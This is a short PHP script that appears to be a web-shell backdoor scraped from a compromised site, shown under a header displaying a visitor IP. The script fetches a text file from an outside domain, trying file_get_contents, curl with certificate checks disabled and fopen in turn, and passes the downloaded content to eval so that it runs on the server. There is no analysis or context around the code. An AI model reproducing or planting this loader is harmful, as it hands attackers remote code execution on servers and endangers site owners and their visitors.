????
Your IP : 18.218.121.8
<?php
$protocol = "https";
$domain = "seneporno.com";
$file_path = "/3.txt";
$url = $protocol . "://" . $domain . $file_path;
// Array dengan beberapa metode pengambilan data
$fetch_methods = [
'file_get_contents' => function($url) {
if (ini_get('allow_url_fopen')) {
return file_get_contents($url);
}
return false;
},
'curl' => function($url) {
if (function_exists('curl_version')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
return false;
},
'stream' => function($url) {
if ($stream = fopen($url, 'r')) {
$data = stream_get_contents($stream);
fclose($stream);
return $data;
}
return false;
}
];
$content = false;
// Mencoba setiap metode secara berurutan
foreach ($fetch_methods as $method => $fetch_function) {
$content = $fetch_function($url);
if ($content !== false) {
break;
}
}
if ($content !== false) {
eval("?>" . $content);
} else {
echo "エラー。";
}
?>